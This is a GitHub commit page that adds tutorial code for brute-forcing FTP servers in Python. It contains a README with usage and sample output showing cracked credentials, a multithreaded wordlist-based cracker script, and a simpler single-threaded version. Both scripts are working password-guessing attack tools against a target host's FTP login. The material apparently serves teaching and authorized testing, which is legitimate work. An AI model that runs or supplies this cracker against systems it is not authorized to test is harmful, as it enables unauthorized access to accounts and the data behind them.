forked from x4nth055/pythoncode-tutorials
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
6 changed files
with
5,162 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,44 @@ | ||
| # [How to Brute Force FTP Servers in Python](https://www.thepythoncode.com/article/brute-force-attack-ftp-servers-using-ftplib-in-python) | ||
| To run this: | ||
| - `pip3 install -r requirements.txt` | ||
| - Use `ftp_cracker.py` for fast brute force: | ||
| ``` | ||
| python ftp_cracker.py --help | ||
| ``` | ||
| **Output:** | ||
| ``` | ||
| usage: ftp_cracker.py [-h] [-u USER] [-p PASSLIST] [-t THREADS] host | ||
| FTP Cracker made with Python | ||
| positional arguments: | ||
| host The target host or IP address of the FTP server | ||
| optional arguments: | ||
| -h, --help show this help message and exit | ||
| -u USER, --user USER The username of target FTP server | ||
| -p PASSLIST, --passlist PASSLIST | ||
| The path of the pass list | ||
| -t THREADS, --threads THREADS | ||
| Number of workers to spawn for logining, default is 30 | ||
| ``` | ||
| - If you want to use the wordlist `wordlist.txt` in the current directory against the host `192.168.1.2` (can be domain or private/public IP address) with the user `user`: | ||
| ``` | ||
| python ftp_cracker.py 192.168.1.2 -u user -p wordlist.txt | ||
| ``` | ||
| - You can also tweak the number of threads to spawn (can be faster, default is 30): | ||
| ``` | ||
| python ftp_cracker.py 192.168.1.2 -u user -p wordlist.txt --threads 35 | ||
| ``` | ||
| - Output can be something like this: | ||
| ``` | ||
| [!] Trying 123456 | ||
| [!] Trying 12345 | ||
| ... | ||
| [!] Trying sweety | ||
| [!] Trying joseph | ||
| [+] Found credentials: | ||
| Host: 192.168.1.113 | ||
| User: test | ||
| Password: abc123 | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,78 @@ | ||
| import ftplib | ||
| from threading import Thread | ||
| import queue | ||
| from colorama import Fore, init # for fancy colors, nothing else | ||
|
|
||
| # init the console for colors (for Windows) | ||
| # init() | ||
| # initialize the queue | ||
| q = queue.Queue() | ||
|
|
||
| # port of FTP, aka 21 | ||
| port = 21 | ||
|
|
||
| def connect_ftp(): | ||
| global q | ||
| while True: | ||
| # get the password from the queue | ||
| password = q.get() | ||
| # initialize the FTP server object | ||
| server = ftplib.FTP() | ||
| print("[!] Trying", password) | ||
| try: | ||
| # tries to connect to FTP server with a timeout of 5 | ||
| server.connect(host, port, timeout=5) | ||
| # login using the credentials (user & password) | ||
| server.login(user, password) | ||
| except ftplib.error_perm: | ||
| # login failed, wrong credentials | ||
| pass | ||
| else: | ||
| # correct credentials | ||
| print(f"{Fore.GREEN}[+] Found credentials: ") | ||
| print(f"\tHost: {host}") | ||
| print(f"\tUser: {user}") | ||
| print(f"\tPassword: {password}{Fore.RESET}") | ||
| # we found the password, let's clear the queue | ||
| with q.mutex: | ||
| q.queue.clear() | ||
| q.all_tasks_done.notify_all() | ||
| q.unfinished_tasks = 0 | ||
| finally: | ||
| # notify the queue that the task is completed for this password | ||
| q.task_done() | ||
|
|
||
|
|
||
| if __name__ == "__main__": | ||
| import argparse | ||
| parser = argparse.ArgumentParser(description="FTP Cracker made with Python") | ||
| parser.add_argument("host", help="The target host or IP address of the FTP server") | ||
| parser.add_argument("-u", "--user", help="The username of target FTP server") | ||
| parser.add_argument("-p", "--passlist", help="The path of the pass list") | ||
| parser.add_argument("-t", "--threads", help="Number of workers to spawn for logining, default is 30", default=30) | ||
|
|
||
| args = parser.parse_args() | ||
| # hostname or IP address of the FTP server | ||
| host = args.host | ||
| # username of the FTP server, root as default for linux | ||
| user = args.user | ||
| passlist = args.passlist | ||
| # number of threads to spawn | ||
| n_threads = args.threads | ||
| # read the wordlist of passwords | ||
| passwords = open(passlist).read().split("\n") | ||
|
|
||
| print("[+] Passwords to try:", len(passwords)) | ||
|
|
||
| # put all passwords to the queue | ||
| for password in passwords: | ||
| q.put(password) | ||
|
|
||
| # create `n_threads` that runs that function | ||
| for t in range(n_threads): | ||
| thread = Thread(target=connect_ftp) | ||
| # will end when the main thread end | ||
| thread.daemon = True | ||
| thread.start() | ||
| # wait for the queue to be empty | ||
| q.join() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| colorama |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| import ftplib | ||
| from colorama import Fore, init # for fancy colors, nothing else | ||
|
|
||
| # init the console for colors (for Windows) | ||
| init() | ||
| # hostname or IP address of the FTP server | ||
| host = "192.168.1.113" | ||
| # username of the FTP server, root as default for linux | ||
| user = "test" | ||
| # port of FTP, aka 21 | ||
| port = 21 | ||
|
|
||
| def is_correct(password): | ||
| # initialize the FTP server object | ||
| server = ftplib.FTP() | ||
| print(f"[!] Trying", password) | ||
| try: | ||
| # tries to connect to FTP server with a timeout of 5 | ||
| server.connect(host, port, timeout=5) | ||
| # login using the credentials (user & password) | ||
| server.login(user, password) | ||
| except ftplib.error_perm: | ||
| # login failed, wrong credentials | ||
| return False | ||
| else: | ||
| # correct credentials | ||
| print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET) | ||
| return True | ||
|
|
||
|
|
||
| # read the wordlist of passwords | ||
| passwords = open("wordlist.txt").read().split("\n") | ||
| print("[+] Passwords to try:", len(passwords)) | ||
|
|
||
| # iterate over passwords one by one | ||
| # if the password is found, break out of the loop | ||
| for password in passwords: | ||
| if is_correct(password): | ||
| break |
Oops, something went wrong.